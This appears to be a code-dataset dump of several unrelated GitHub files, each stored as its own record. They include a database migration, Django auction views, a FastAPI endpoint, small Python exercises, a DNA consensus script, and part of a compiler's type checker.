c0cee112ff47\nCreate Date: 2023-04-24 11:35:58.484218\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7bb9d6ce548f'\ndown_revision = 'c0cee112ff47'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('job_application',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('job_id', sa.Integer(), nullable=True),\n sa.Column('user_id', sa.Integer(), nullable=True),\n sa.Column('company_id', sa.Integer(), nullable=True),\n sa.Column('contact_number', sa.Integer(), nullable=False),\n sa.Column('contact_email', sa.String(length=120), nullable=False),\n sa.Column('resume', sa.Text(), nullable=False),\n sa.Column('message', sa.Text(), nullable=True),\n sa.Column('reply', sa.Text(), nullable=True),\n sa.Column('status', sa.Enum('submited', 'reviewed', 'interview', 'offered', 'rejected', name='jobapplicationstatus'), nullable=False),\n sa.Column('created_at', sa.DateTime(), nullable=True),\n sa.Column('updated_at', sa.DateTime(), nullable=True),\n sa.ForeignKeyConstraint(['company_id'], ['company.id'], ),\n sa.ForeignKeyConstraint(['job_id'], ['job.id'], ),\n sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),\n sa.PrimaryKeyConstraint('id')\n )\n with op.batch_alter_table('job_application', schema=None) as batch_op:\n batch_op.create_index(batch_op.f('ix_job_application_contact_email'), ['contact_email'], unique=False)\n batch_op.create_index(batch_op.f('ix_job_application_created_at'), ['created_at'], unique=False)\n batch_op.create_index(batch_op.f('ix_job_application_updated_at'), ['updated_at'], unique=False)\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('job_application', schema=None) as batch_op:\n batch_op.drop_index(batch_op.f('ix_job_application_updated_at'))\n batch_op.drop_index(batch_op.f('ix_job_application_created_at'))\n batch_op.drop_index(batch_op.f('ix_job_application_contact_email'))\n\n op.drop_table('job_application')\n # ### end Alembic commands ###\n","repo_name":"waikitpo/itp4115_EA_D05","sub_path":"migrations/versions/7bb9d6ce548f_job_application.py","file_name":"7bb9d6ce548f_job_application.py","file_ext":"py","file_size_in_byte":2286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"43389407140","text":"class student:\n \n def getStudent(self):\n print(\"ID: \",self.ID)\n print(\"Name: \",self.name)\n print(\"Discipline: \",self.dis)\n print(\"Marks: \",self.marks)\n\n def setStudent(self):\n print(\"Enter ID:\")\n self.ID=int(input())\n print(\"Enter name:\")\n self.name=input()\n print(\"Enter Discipline:\")\n self.dis=input()\n i=1\n self.marks=[]\n print(\"Enter number of subjects to enter:\")\n self.n=int(input())\n for i in range(1,self.n+1):\n print(\"Enter Marks \",i ,\": \")\n a=int(input())\n self.marks.append(a)\n \n def avg(self):\n print(\"\")\n\n \nprint(\"Enter the number of students to enter:\")\nnum=int(input())\ni=0\nstu=[]\nfor i in range(0,num):\n stu.append(i)\n stu[i]=student()\n stu[i].setStudent()\ni=0\nfor i in range(0,num):\n stu[i].getStudent()\n","repo_name":"Archit-Jain05/Python-Codes","sub_path":"College/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"72851725161","text":"from fastapi import FastAPI, Depends\nfrom fastapi.responses import JSONResponse\nfrom next_word_predictor import Model, get_model\n\napp = FastAPI()\n\n\n@app.get(\"/\")\ndef read_root():\n return {\"Hello\": \"World\"}\n\n\n@app.get(\"/predict/{q}\")\ndef read_item(q: str = None, bert_model: Model = Depends(get_model)):\n print(q)\n predictions = bert_model.predict(q)\n\n content = {\"q\": q, \"predictions\": predictions}\n headers = {\"Access-Control-Allow-Origin\": \"*\"}\n\n return JSONResponse(content=content, headers=headers)\n\n","repo_name":"christinabo/next-word-predictor-bert","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"14363933322","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.db import IntegrityError\nfrom django.db.models import Max\nfrom django.core.exceptions import ValidationError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render\nfrom django.urls import reverse\nfrom django.utils.datastructures import MultiValueDictKeyError\n\nfrom .models import User, Listing, Bid, Comment, Watchlist\n\n\ndef index(request):\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n return render(request, \"auctions/index.html\", {\n \"listings\": Listing.objects.all().filter(closed=False),\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n except User.DoesNotExist:\n return render(request, \"auctions/index.html\", {\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n\n\ndef login_view(request):\n if request.method == \"POST\":\n\n # Attempt to sign user in\n username = request.POST[\"username\"]\n password = request.POST[\"password\"]\n user = authenticate(request, username=username, password=password)\n\n # Check if authentication successful\n if user is not None:\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/login.html\", {\n \"message\": \"Invalid username and/or password.\"\n })\n else:\n return render(request, \"auctions/login.html\")\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect(reverse(\"index\"))\n\n\ndef register(request):\n if request.method == \"POST\":\n username = request.POST[\"username\"]\n email = request.POST[\"email\"]\n\n # Ensure password matches confirmation\n password = request.POST[\"password\"]\n confirmation = request.POST[\"confirmation\"]\n if password != confirmation:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Passwords must match.\"\n })\n\n # Attempt to create new user\n try:\n user = User.objects.create_user(username, email, password)\n user.save()\n except IntegrityError:\n return render(request, \"auctions/register.html\", {\n \"message\": \"Username already taken.\"\n })\n login(request, user)\n return HttpResponseRedirect(reverse(\"index\"))\n else:\n return render(request, \"auctions/register.html\")\n\n\n@login_required\ndef create(request):\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n if request.method == \"POST\":\n title = request.POST[\"title\"]\n description = request.POST[\"description\"]\n price = request.POST[\"price\"]\n category = request.POST[\"category\"]\n\n # Upload image to model, exception if no image is selected\n try:\n image = request.FILES[\"image\"]\n except MultiValueDictKeyError:\n image = request.POST.get('image', False)\n try:\n listing = Listing.objects.create(person=person ,title=title, description=description, price=price, image=image, closed=False, category=category)\n listing.save()\n except ValidationError:\n return render(request, \"auctions/index.html\", {\n \"bad_message\": \"Invalid value(s)\"\n })\n return render(request, \"auctions/index.html\", {\n \"good_message\": \"Listing created successfully.\",\n \"listings\": Listing.objects.all().filter(closed=False),\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n return render(request, \"auctions/create.html\", {\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n\n\ndef show_listing(request, listing_id):\n listing = Listing.objects.get(pk=listing_id)\n bidCount = Bid.objects.all().filter(item=listing).count()\n commentCount = Comment.objects.all().filter(refItem=listing).count()\n comments = Comment.objects.all().filter(refItem=listing)\n\n # Get highest bid if it exists, set to None otherwise\n try:\n highestBid = Bid.objects.all().filter(item=listing).order_by('-amount').first().amount\n except:\n highestBid = None\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n try:\n userBid = Bid.objects.all().filter(person=person, item=listing).order_by('-amount').first().amount\n except:\n userBid = None\n if request.method == 'POST':\n\n # If a comment is posted update\n if 'placeComment' in request.POST:\n text = request.POST[\"comment\"]\n comment = Comment.objects.create(refItem=listing, name=person, text=text)\n comment.save()\n return render(request, \"auctions/index.html\", {\n \"neutral_message\": \"Comment placed.\",\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n \n # Check if forms was submitted from user that made the listing, then the request is for closing the auction\n if person == listing.person:\n listing.closed = True\n listing.save(update_fields=['closed'])\n return render(request, \"auctions/index.html\", {\n \"good_message\": \"Auction closed successfully.\",\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n \n # Otherwise, it is for making a bid\n bidAmount = request.POST[\"bid\"]\n bid = Bid.objects.create(person=person, item=listing, amount=bidAmount)\n bid.save()\n return render(request, \"auctions/index.html\", {\n \"good_message\": \"Bid placed successfully.\",\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n \n # If no POST request is made simply display the listing, check if listing already in watchlist\n try:\n watchedItem = Watchlist.objects.get(person=person, item=listing)\n return render(request, \"auctions/listing.html\", {\n \"listing\": listing,\n \"bidCount\": bidCount,\n \"highestBid\": highestBid,\n \"userBid\": userBid,\n \"onWatchlist\": watchedItem,\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"commentCount\": commentCount,\n \"comments\": comments\n })\n except Watchlist.DoesNotExist:\n return render(request, \"auctions/listing.html\", {\n \"listing\": listing,\n \"bidCount\": bidCount,\n \"highestBid\": highestBid,\n \"userBid\":userBid,\n \"watchlistCount\": Watchlist.objects.filter(person=person).count(),\n \"commentCount\": commentCount,\n \"comments\": comments\n })\n \n # If user is not logged in\n except User.DoesNotExist:\n return render(request, \"auctions/listing.html\", {\n \"listing\": listing,\n \"highestBid\": highestBid,\n \"commentCount\": commentCount,\n \"comments\": comments\n })\n\n\n@login_required\ndef show_watchlist(request):\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n if request.method == 'POST':\n\n # Get item from Listing models\n listing = request.POST[\"item\"]\n item = Listing.objects.get(id=listing)\n\n # Try removing object from watchlist, add to watchlist if it doesn't exist\n try:\n watchedItem = Watchlist.objects.get(person=person, item=item)\n watchlist = Watchlist.objects.filter(person=person, item=item).delete()\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": Watchlist.objects.all().filter(person=person),\n \"good_message\": \"Removed from Watchlist.\"\n })\n except Watchlist.DoesNotExist:\n watchlist = Watchlist.objects.create(person=person, item=item)\n watchlist.save()\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": Watchlist.objects.all().filter(person=person),\n \"good_message\": \"Added to Watchlist.\"\n })\n return render(request, \"auctions/watchlist.html\", {\n \"watchlist\": Watchlist.objects.all().filter(person=person)\n })\n\n\ndef show_categories(request):\n categories = ['Home', 'Electronics', 'Clothing', 'Sports', 'Motors']\n\n # Category is selected \n if request.method == 'POST':\n selectedCategory = request.POST[\"category\"]\n categorizedListings = Listing.objects.all().filter(closed=False, category=selectedCategory)\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n return render(request, \"auctions/categories.html\", {\n \"selectedCategory\": selectedCategory,\n \"categories\": categories,\n \"listings\": categorizedListings,\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n except User.DoesNotExist:\n return render(request, \"auctions/categories.html\", {\n \"selectedCategory\": selectedCategory,\n \"categories\": categories,\n \"listings\": categorizedListings\n })\n\n # No category selected\n try:\n currentUser = request.user.id\n person = User.objects.get(id=currentUser)\n return render(request, \"auctions/categories.html\", {\n \"categories\": categories,\n \"listings\": Listing.objects.all().filter(closed=False),\n \"watchlistCount\": Watchlist.objects.filter(person=person).count()\n })\n except User.DoesNotExist:\n return render(request, \"auctions/categories.html\", {\n \"categories\": categories,\n \"listings\": Listing.objects.all().filter(closed=False)\n })\n","repo_name":"konpapp/HarvardX","sub_path":"commerce/auctions/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"6230185607","text":"import os\n\nQUERYENGINE_API_ROOT = \"http://{host}:{port}/v3/queryengine\".format(\n host=os.environ[\"QUERYENGINE_API_HOST\"], port=os.environ[\"QUERYENGINE_API_PORT\"]\n)\n\nAUTH_API_ROOT = \"http://{host}:{port}/v3/auth\".format(\n host=os.environ[\"AUTH_API_HOST\"], port=os.environ[\"AUTH_API_PORT\"]\n)\n\nMETA_API_ROOT = \"http://{host}:{port}/v3/meta\".format(\n host=os.environ[\"META_API_HOST\"], port=os.environ[\"META_API_PORT\"]\n)\n\nDATALAB_API_ROOT = \"http://{host}:{port}/v3/datalab\".format(\n host=os.environ[\"DATALAB_API_HOST\"], port=os.environ[\"DATALAB_API_PORT\"]\n)\n\nDATAFLOW_API_ROOT = \"http://{host}:{port}/v3/dataflow\".format(\n host=os.environ[\"DATAFLOW_API_HOST\"], port=os.environ[\"DATAFLOW_API_PORT\"]\n)\n\nDATAHUB_API_ROOT = \"http://{host}:{port}/v3\".format(\n host=os.environ[\"DATAHUB_API_HOST\"], port=os.environ[\"DATAHUB_API_PORT\"]\n)\n\nJUPYTERHUB_USER = os.environ[\"JUPYTERHUB_USER\"]\n","repo_name":"Tencent/bk-base","sub_path":"src/datalab/notebook/notebook-command/command/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"18"} +{"seq_id":"36656918105","text":"\"\"\"day2_jewels_and_stones.py\n Created by Aaron at 02-May-20\"\"\"\nclass Solution:\n def numJewelsInStones(self, J: str, S: str) -> int:\n # app1\n # dic={x for x in J}\n # ans=0\n # for x in S:\n # if x in dic:\n # ans+=1\n # return ans\n\n # app2\n dic = {x for x in J}\n return sum(x in dic for x in S)\n \n # app3\n # return sum(map(J.count, S))\n\nrun=Solution()\na,b=\"aA\",\"aAAbbbb\"\nprint(run.numJewelsInStones(a,b))\n# app1 J in dictionary and traverse S and check the dictonary, time O(m+n) space O(m)/O(n)\n# app2 similar to app1 but using sum, time O(m+n) space O(m)/O(n)\n# app3 check frequently, time O(mn) space O(1)","repo_name":"aaron6347/leetcode_May30Days","sub_path":"venv/day2_jewels_and_stones.py","file_name":"day2_jewels_and_stones.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"33025455764","text":"import pandas as pd\nimport numpy as np\nfrom fraud_detector.utils import get_abs_path\nfrom sklearn.model_selection import train_test_split\nfrom typing import Tuple\n\n\ndef load_data(file_path: str = \"data/dataset_TakeHome.csv\") -> pd.DataFrame:\n \"\"\"Loads data from a csv file.\n\n Args:\n file_path (str): The name of the file to load. Should either be absolute or relative to the base repo.\n\n Returns:\n pd.DataFrame: dataset as dataframe\n \"\"\"\n return pd.read_csv(get_abs_path(file_path))\n\n\ndef preprocess_data(\n df: pd.DataFrame, target_var: str = \"Outcome\"\n) -> Tuple[np.ndarray, np.ndarray, np.ndarray, np.ndarray]:\n \"\"\"Preprocesses the dataframe by removing unnecessary columns and rows.\n\n Args:\n df (pd.DataFrame): The dataframe to clean.\n\n Returns:\n Tuple[np.ndarray]: X_train, X_test, y_train, y_tes\n \"\"\"\n df = _clean_data(df)\n df = _feature_selection(df)\n # X_train, X_test, y_train, y_test\n return train_test_split(\n df.drop(columns=[target_var]), df[target_var], test_size=0.2, random_state=42\n )\n\n\ndef _clean_data(df: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Cleans the dataframe by removing unnecessary columns and rows.\n\n Args:\n df (pd.DataFrame): The dataframe to clean.\n\n Returns:\n pd.DataFrame: cleaned dataframe\n \"\"\"\n df.drop_duplicates(inplace=True)\n df.dropna(inplace=True)\n return df\n\n\ndef _feature_selection(df: pd.DataFrame, corr_threshold: float = 0.7) -> pd.DataFrame:\n \"\"\"Selects the features to use in the model.\n\n Args:\n df (pd.DataFrame): The dataframe to clean.\n\n Returns:\n pd.DataFrame: cleaned dataframe\n \"\"\"\n corr_matrix = df.corr().abs()\n upper_tri = corr_matrix.where(\n np.triu(np.ones(corr_matrix.shape), k=1).astype(np.bool)\n )\n cols_to_drop = [\n column\n for column in upper_tri.columns\n if any(upper_tri[column] > corr_threshold)\n ]\n print(f\"Dropping {len(cols_to_drop)} columns: {cols_to_drop}\")\n df = df.drop(columns=cols_to_drop)\n return df\n","repo_name":"suryaavala/finder_test","sub_path":"fraud_detector/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31530335098","text":"# IMPORT\nfrom Bio import SeqIO\n\n\n# FUNCTION\n\ndef profile_ADN(input_file):\n\n fasta_sequences = list(SeqIO.parse(open(input_file),'fasta'))\n len_seq = len(fasta_sequences[0].seq) # hyp. all seq have same len in the fasta file\n # print(f\"len seq : {len_seq}\")\n dict_profile = {\"A\": [0]*len_seq ,\n \"C\": [0]*len_seq,\n \"G\": [0]*len_seq,\n \"T\": [0]*len_seq}\n # print(dict_profile)\n\n for fasta in fasta_sequences:\n sequence = list(fasta.seq)\n for index, nucleotide in enumerate(sequence):\n for key in dict_profile:\n dict_profile[key][index] += int(key == nucleotide)\n\n return dict_profile, len_seq\n\n\ndef consensus(dict_profile, len_seq):\n consensus_list = []\n list_keys = list(dict_profile.keys())\n for index in range(len_seq):\n max_value = 0\n for key in list_keys:\n str = key\n value = dict_profile[str][index]\n if value >= max_value: # '=' not necessary, it's a choice\n str_max = key\n max_value = value\n\n consensus_list.append(str_max)\n\n print( ''.join(consensus_list))\n\n\n\n\n# PARAMETERS\ninput_file = \"16_equal_len.fasta\"\n\n# PROGRAM\ndict_profile, len_seq = profile_ADN(input_file)\n\nconsensus(dict_profile, len_seq)\nfor key, value in dict_profile.items():\n print(f\"{key}: \", end = \"\") \n for num in value:\n print(f\"{num} \", end = \"\")\n print(\"\")\n ","repo_name":"PaulineTurk/ROSALIND","sub_path":"16_Consensus_and_Profile.py","file_name":"16_Consensus_and_Profile.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"547644096","text":"##Generar señales con Python para el ciclo de publicaciones sobre procesamiento digital de señales PDS \n#Importanto las librerías necesarias\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n#Creando un array de mil valores con numpy, de t=0 a t=0.5\nt = np.linspace(0,0.5,1000)\n\n#Generando tres funciones seno, con amplitud unitaria\nsenal_50Hz = np.sin(2*np.pi*50*t) #frecuencia = 50Hz\nsenal_200Hz = np.sin(2*np.pi*200*t) #frecuencia = 200Hz\nsenal_50Hz_500Hz = senal_50Hz + senal_500Hz #suma de señales\n\n# Gráficando tres subplots.\nf, plotArray = plt.subplots(3, sharex=True)\nf.suptitle(\"Señales de ejemplo\")\nplotArray[0].plot(senal_50Hz, color = 'red')\nplotArray[1].plot(senal_200Hz, color = 'green')\nplotArray[2].plot(senal_50Hz_200Hz, color = 'blue')\n","repo_name":"SiderealOcean/PDS","sub_path":"generarSenal.py","file_name":"generarSenal.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18562264645","text":"\"\"\"4. Программа принимает действительное положительное число x и целое отрицательное число\r\ny . Выполните возведение числа x в степень y . Задание реализуйте в виде функции\r\nmy_func(x, y) . При решении задания нужно обойтись без встроенной функции возведения\r\nчисла в степень.\r\nПодсказка: попробуйте решить задачу двумя способами. Первый — возведение в степень с\r\nпомощью оператора **. Второй — более сложная реализация без оператора **,\r\nпредусматривающая использование цикла.\"\"\"\r\n\r\n\"\"\"Решение по первому варианту\"\"\"\r\n\r\n\r\ndef degree_number_variant1(x, y):\r\n print(f\"Вариант 1: {x ** y}\")\r\n\r\n\r\ndef degree_number_variant2(x, y):\r\n \"\"\"для целых чисел X в степени минус Y это 1/X**Y=> 4**(-2) =>1/4**2 =>1/16\"\"\"\r\n s = 1\r\n for i in range(abs(y)):\r\n s *= 1 / x\r\n print(f\"Вариант 2: {s}\")\r\n\r\n\r\ninput_x = abs(float(input(\"Введите число Х в виде действительного положительного числа:\")))\r\ninput_y = int(input(\"Введите степень Y в виде целого отрицательного числа:\"))\r\nif input_y < 0:\r\n degree_number_variant1(input_x, input_y)\r\n degree_number_variant2(input_x, input_y)\r\nelse:\r\n print(\"Неверно введено значение Y!\")\r\n","repo_name":"andyleva/kurs-python","sub_path":"lesson03-hw04.py","file_name":"lesson03-hw04.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"28500120039","text":"from typing import List, Dict, Union, Iterable\r\n\r\nfrom parsing.op import *\r\nfrom state import *\r\nfrom .types import type_to_str\r\nfrom .types import *\r\n\r\nassert len(Operator) == 20, \"Unimplemented operator in type_checking.py\"\r\nassert len(OpType) == 40, \"Unimplemented type in type_checking.py\"\r\nassert len(BlockType) == 6, \"Unimplemented block type in type_checking.py\"\r\n\r\n\r\ndef check_stack(stack: List[Type], expected: List[Type], arg=0):\r\n assert len(stack) >= len(expected), \"stack is too short\"\r\n for i in range(len(expected)):\r\n got = stack.pop()\r\n exp = expected.pop()\r\n if got != exp and exp is not None and got is not None:\r\n State.throw_error(f\"unexpected argument type\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mArgument {i+1+arg}\\033[0m: {type_to_str(got)} instead of {type_to_str(exp)}\\n\"\r\n )\r\n exit(1)\r\n\r\n\r\ndef check_route_stack(\r\n stack1: List[Type], stack2: List[Type], error: str = \"in different routes of if-end\"\r\n):\r\n if len(stack1) > len(stack2):\r\n State.throw_error(f\"stack has extra elements {error}\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mTypes\\033[0m: {', '.join(type_to_str(i) for i in stack1[len(stack2)-len(stack1):])}\\n\"\r\n )\r\n exit(1)\r\n if len(stack1) < len(stack2):\r\n State.throw_error(f\"stack has not enought elements {error}\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mTypes\\033[0m: {', '.join(type_to_str(i) for i in stack2[len(stack1)-len(stack2):])}\\n\"\r\n )\r\n exit(1)\r\n for i in range(len(stack1)):\r\n if (\r\n not check_varient(stack1[i], stack2[i]) and\\\r\n stack1[i] is not None and stack2[i] is not None\r\n ):\r\n State.throw_error(f\"different types {error}\", False)\r\n sys.stderr.write(\r\n f\"\\033[1;34mElement {len(stack1)-i}\\033[0m: {type_to_str(stack1[i])} instead of {type_to_str(stack2[i])}\\n\"\r\n )\r\n exit(1)\r\n\r\n stack1[i] = down_cast(stack1[i], stack2[i])\r\n\r\n\r\ndef type_check(ops: List[Op], is_main: bool = False):\r\n stack: list = []\r\n\r\n if is_main and State.config.struct_malloc[1]:\r\n State.loc = \"\"\r\n if \"malloc\" not in State.procs:\r\n assert not State.config.struct_malloc[0],\\\r\n \"Malloc procedure not found while struct_malloc is enabled\"\r\n State.config.config[\"struct_malloc\"] = False\r\n else:\r\n proc = State.procs[\"malloc\"]\r\n if proc.in_stack != [Int()]:\r\n assert not State.config.struct_malloc[0],\\\r\n \"Malloc must take one integer, disable struct_malloc if you don't want the compiler to use malloc\"\r\n State.config.config[\"struct_malloc\"] = False\r\n if proc.out_stack != [Ptr()]:\r\n assert not State.config.struct_malloc[0],\\\r\n \"Malloc must return one pointer, disable struct_malloc if you don't want the compiler to use malloc\"\r\n State.config.config[\"struct_malloc\"] = False\r\n if State.config.struct_malloc[1]:\r\n State.add_proc_use(proc)\r\n\r\n if is_main and len(State.runtimed_types_list):\r\n State.loc = \"\"\r\n for struct in State.TYPE_STRUCTS:\r\n assert struct in State.structures,\\\r\n f\"If types in runtime are used type.cn must be included from std. Structure {struct} not found.\"\r\n\r\n index = 0\r\n while index < len(ops):\r\n op = ops[index]\r\n new_op = type_check_op(op, stack)\r\n if isinstance(new_op, Iterable):\r\n ops[index : index + 1] = new_op\r\n index += len(new_op) - 1\r\n elif new_op is not None:\r\n ops[index] = new_op\r\n\r\n index += 1\r\n\r\n if is_main:\r\n ops.extend([Op(OpType.OPERATOR, Operator.DROP) \r\n for _ in range(len(stack))])\r\n\r\n return stack\r\n\r\n\r\ndef process_for_in(op: Op, stack: List[Type], iter_stack: list) -> list:\r\n type_ = iter_stack[0]\r\n check_stack(iter_stack, [Ptr(Array())])\r\n type_ = type_.typ\r\n State.ops_by_ips[op.operand[0].end].operand = (*op.operand[:2], type_)\r\n if type_.len == 0:\r\n return []\r\n State.route_stack.append((\"for\", stack.copy()))\r\n State.bind_stack.extend((Int(), type_.typ))\r\n if State.config.re_IOR:\r\n State.locs_to_include.append(op.loc)\r\n op.operand[0].type = BlockType.WHILE\r\n return [\r\n Op(OpType.PUSH_INT, 0, loc=op.loc),\r\n Op(OpType.PUSH_INT, 1, loc=op.loc),\r\n Op(OpType.WHILE, op.operand[0], loc=op.loc), # TODO:\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n *op.operand[2],\r\n Op(\r\n OpType.INDEX,\r\n (sizeof(type_.typ), type_.len),\r\n loc_id=len(State.locs_to_include) - 1,\r\n loc=op.loc,\r\n ),\r\n Op(OpType.BIND, 2, loc=op.loc),\r\n ]\r\n\r\n\r\ndef process_for_until(op: Op, stack: List[Type], iter_stack: list) -> list:\r\n check_stack(iter_stack, [Ptr()])\r\n State.route_stack.append((\"for\", stack.copy()))\r\n State.bind_stack.extend((Ptr(), Int()))\r\n op.operand[0].type = BlockType.WHILE\r\n\r\n if State.config.re_NPD:\r\n State.locs_to_include.append(op.loc)\r\n\r\n return [\r\n *op.operand[2],\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(\r\n OpType.OPERATOR,\r\n Operator.LOAD8,\r\n loc=op.loc,\r\n loc_id=len(State.locs_to_include) - 1,\r\n ),\r\n Op(OpType.OPERATOR, Operator.DUP, loc=op.loc),\r\n Op(OpType.PUSH_INT, 0, loc=op.loc),\r\n Op(OpType.OPERATOR, Operator.NE, loc=op.loc),\r\n Op(OpType.WHILE, op.operand[0], loc=op.loc),\r\n Op(OpType.BIND, 2, loc=op.loc),\r\n ]\r\n\r\n\r\ndef match_type_var(typ: Optional[Type], actual: Optional[Type]) -> Dict[int, Type]:\r\n if typ is None or actual is None:\r\n return {}\r\n if isinstance(typ, VarType):\r\n return {id(typ): actual}\r\n if isinstance(typ, Ptr) and isinstance(actual, Ptr):\r\n return match_type_var(typ.typ, actual.typ)\r\n if isinstance(typ, Array) and isinstance(actual, Array):\r\n return match_type_var(typ.typ, actual.typ)\r\n return {}\r\n\r\n\r\ndef get_var_type_values(types: List[Type], stack: List[Type]) -> Dict[int, Type]:\r\n var_types: Dict[int, Type] = {}\r\n assert len(stack) >= len(types), \"Not enough elements on the stack\"\r\n for typ, actual in zip(types, stack):\r\n var_types = {**match_type_var(typ, actual), **var_types}\r\n return var_types\r\n\r\n\r\ndef get_concrete_type(typ: Type, var_types: Dict[int, Type]) -> Type:\r\n if isinstance(typ, VarType):\r\n assert id(typ) in var_types, f'Cannot obtain value for type varaible \"{typ.name}\"'\r\n return var_types[id(typ)]\r\n if isinstance(typ, Ptr):\r\n return Ptr(get_concrete_type(typ.typ, var_types))\r\n if isinstance(typ, Array):\r\n return Array(typ.len, get_concrete_type(typ.typ, var_types))\r\n return typ\r\n\r\n\r\ndef process_call(op: Op, stack: List[Type]) -> None:\r\n in_types: List[object] = []\r\n out_types: List[object] = []\r\n var_types = get_var_type_values(\r\n op.operand.in_stack, stack[-len(op.operand.in_stack):]\r\n )\r\n for typ in op.operand.in_stack:\r\n in_types.append(get_concrete_type(typ, var_types))\r\n for typ in op.operand.out_stack:\r\n out_types.append(get_concrete_type(typ, var_types))\r\n check_stack(stack, in_types)\r\n stack.extend(out_types)\r\n\r\n\r\ndef type_check_op(op: Op, stack: List[Type]) -> Optional[Union[Op, List[Op]]]:\r\n cont_assert(len(OpType) == 40, \"Unimplemented type in type_check_op\")\r\n\r\n State.loc = op.loc\r\n\r\n if not op.compiled:\r\n return None\r\n\r\n if op.type == OpType.PUSH_INT:\r\n stack.append(Int())\r\n elif op.type in (OpType.PUSH_MEMORY, OpType.PUSH_LOCAL_MEM):\r\n stack.append(Ptr())\r\n elif op.type == OpType.PUSH_VAR:\r\n if must_ptr(State.variables[op.operand]):\r\n stack.append(Ptr(State.variables[op.operand]))\r\n return Op(OpType.PUSH_VAR_PTR, op.operand, loc=op.loc)\r\n else:\r\n stack.append(State.variables[op.operand])\r\n elif op.type == OpType.PUSH_VAR_PTR:\r\n assert not must_ptr(State.variables[op.operand]),\\\r\n \"variable is automatically a pointer, cannot push a pointer excplicitly\"\r\n stack.append(Ptr(State.variables[op.operand]))\r\n elif op.type == OpType.PUSH_LOCAL_VAR:\r\n cont_assert(State.current_proc is not None,\r\n \"Probably bug in parsing with local and global variables\")\r\n if must_ptr(State.current_proc.variables[op.operand]):\r\n stack.append(Ptr(State.current_proc.variables[op.operand]))\r\n return Op(OpType.PUSH_LOCAL_VAR_PTR, op.operand, loc=op.loc)\r\n else:\r\n stack.append(State.current_proc.variables[op.operand])\r\n elif op.type == OpType.PUSH_LOCAL_VAR_PTR:\r\n cont_assert(State.current_proc is not None,\r\n \"Probably bug in parsing with local and global variables\")\r\n assert not must_ptr(State.current_proc.variables[op.operand]),\\\r\n \"variable is automatically a pointer, cannot push a pointer excplicitly\"\r\n\r\n stack.append(Ptr(State.current_proc.variables[op.operand]))\r\n elif op.type == OpType.PUSH_STR:\r\n stack.append(Int())\r\n stack.append(Ptr())\r\n elif op.type == OpType.PUSH_NULL_STR:\r\n stack.append(Ptr())\r\n elif op.type == OpType.PUSH_PROC:\r\n stack.append(Addr(op.operand.in_stack, op.operand.out_stack))\r\n elif op.type == OpType.CAST:\r\n check_stack(stack, [None])\r\n stack.append(op.operand)\r\n elif op.type == OpType.UPCAST:\r\n assert len(stack) >= 1, \"stack is too short\"\r\n struct = stack[-1]\r\n 